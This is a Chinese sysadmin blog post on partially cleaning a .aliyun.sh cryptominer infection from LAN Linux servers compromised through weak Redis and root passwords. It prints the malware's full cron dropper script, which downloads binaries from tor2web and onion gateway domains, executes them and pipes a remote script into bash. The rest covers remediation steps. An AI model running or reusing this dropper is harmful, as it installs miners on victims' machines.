• 局域网Linux机器中病毒简单处理 .aliyun.sh 挖矿病毒 ---不彻底


    1. 昨天晚上同事打电话给我说自己的服务器上面的redis无故被清空了,并且查看aof 日志有很多 wget和write指令

    一想就是大事不好.局域网中病毒了..

    2. 今天早上到公司忙完一阵简单看了下,就发现了五台机器中病毒. (悲伤无以言表)

    3. 现象: CPU暴高, 通过虚拟化控制台就能看到

     4. 进入虚拟机简单查看一下. 使用top 就能看到

     5. 最简单的查看流程. 先看计划任务

    crontab -e

    病毒的脚本文件为:

    exec &>/dev/null
    export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
    t=trumps4c4ohxvq7o
    dir=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
    for i in /usr/bin $dir /dev/shm /tmp /var/tmp;do touch $i/i && cd $i && rm -f i && break;done
    x() {
    f=/int
    d=./$(date|md5sum|cut -f1 -d-)
    wget -t1 -T10 -qU- --no-check-certificate $1$f -O$d || curl -m10 -fsSLkA- $1$f -o$d
    chmod +x $d;$d;rm -f $d
    }
    u() {
    x=/crn
    wget -t1 -T10 -qU- -O- --no-check-certificate $1$x || curl -m10 -fsSLkA- $1$x
    }
    for h in tor2web.io 4tor.ml onion.mn onion.in.net onion.to d2web.org civiclink.network onion.ws onion.nz onion.glass tor2web.su
    do
    if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
    x trumps4c4ohxvq7o.$h
    else
    break
    fi
    done
    
    if ! ls /proc/$(cat /tmp/.X11-unix/00)/io; then
    (
    u $t.tor2web.io ||
    u $t.4tor.ml ||
    u $t.d2web.org ||
    u $t.onion.mn ||
    u $t.onion.in.net ||
    u $t.onion.to ||
    u $t.civiclink.network ||
    u $t.onion.pet ||
    u $t.tor2web.su ||
    u $t.onion.glass ||
    u $t.onion.ws
    )|bash
    fi

    中病毒无疑

    删了这条记录,并且将刚才的哪个进程杀掉.

    6.删除root目录下的文件

    rm -rf /root/.aliyun.sh

    7. /usr/bin 目录下还有别的东西 暂时没时间看...

    8. 暂时关闭cron的服务避免再次被安装 (周六中午发现没卵用,)

    systemctl disable crond && systemctl stop crond

    9. 创建一个.aliyun.sh的文件并且增加上不可修改的权限等 

    touch /root/.aliyun.sh
    chmod 0000  /root/.aliyun.sh
    chattr +i  /root/.aliyun.sh
    mv /usr/bin/chattr /usr/bin/fuckchattr

    10. 初步结论

    1. redis 0.0.0.0 弱密码必须要修改
    2.root账户的弱密码口令必须处理 也有没开redis端口有感染的情况.
    3. ssh 互信的机器要关注一下. 
    

      

     11. 12.8 凌晨继续补充

    病毒很变态 发现还有一个驻留进程不占CPU ,所以不能仅通过htop来查看进程还要通过pstree来去查找病毒进程

    如图示。

            ├─packagekitd───2*[{packagekitd}]
            ├─pcscd───2*[{pcscd}]
            ├─polkitd───6*[{polkitd}]
            ├─postmaster───7*[postmaster]
            ├─pulseaudio───{pulseaudio}
            ├─rngd
            ├─rpcbind
            ├─rsyslogd───2*[{rsyslogd}]
            ├─rtkit-daemon───2*[{rtkit-daemon}]
            ├─smartd
            ├─sqlservr─┬─sqlservr───152*[{sqlservr}]
            │          └─{sqlservr}
            ├─sshd───sshd───bash───pstree
            ├─systemd-journal
            ├─systemd-logind
            ├─systemd-udevd
            ├─tnslsnr───{tnslsnr}
            ├─tuned───4*[{tuned}]
            ├─udisksd───4*[{udisksd}]
            ├─upowerd───2*[{upowerd}]
            ├─vmtoolsd
            ├─wpa_supplicant
            ├─xdg-permission-───2*[{xdg-permission-}]
            └─y0qYwK

    简单分析一下这个进程。发现 的确会出发新的任务来挖矿,只能先简单的干掉这个进程。再看看有没有进程出现。 

    二进制文件 直接被删除掉了很难搞。 

    索性将/usr/bin 目录设置只读属性不允许写入再进行尝试。 

    /opt 目录下面也有aliyun.sh

    刚才反查了下域名 四月份到六月份注册的。 应该是新变种病毒。 

     12. 继续补充

    发现病毒目录采取了 在/tmp 目录下面的文件

    使用lsof简单查询一下到底用到了进程然后杀之

    文件路径为:

    /tmp/.X11-unix
    [root@CentOS77 .X11-unix]# lsof 00
    COMMAND   PID USER   FD   TYPE DEVICE SIZE/OFF     NODE NAME
    EyLyU3  30935 root    0w   REG  253,0        6 74418570 00
    [root@CentOS77 .X11-unix]# ll /proc/30935/
    total 0

     顺便干掉这个目录继续观察

    rm -rf /tmp/.X11-unix/
  • 相关阅读:
    matlablib安装Helvetica字体
    word插入矢量图的方法
    字体对应关系
    MySQL8.0.15基于mycat读写分离(windows环境)
    2.MySQL8.0.15主从同步(windows环境)
    1.MySQL8.0.15安装步骤(windows环境)
    mysql自带的压力测试工具
    FreeFileSync + Windows任务计划程序 实现自动备份功能
    FreeFileSync 设置服务器文件自动备份,同时可做本地代码程序同步软件
    dokcer镜像添加ssh服务
  • 原文地址:https://www.cnblogs.com/jinanxiaolaohu/p/11993504.html
Copyright © 2020-2023  润新知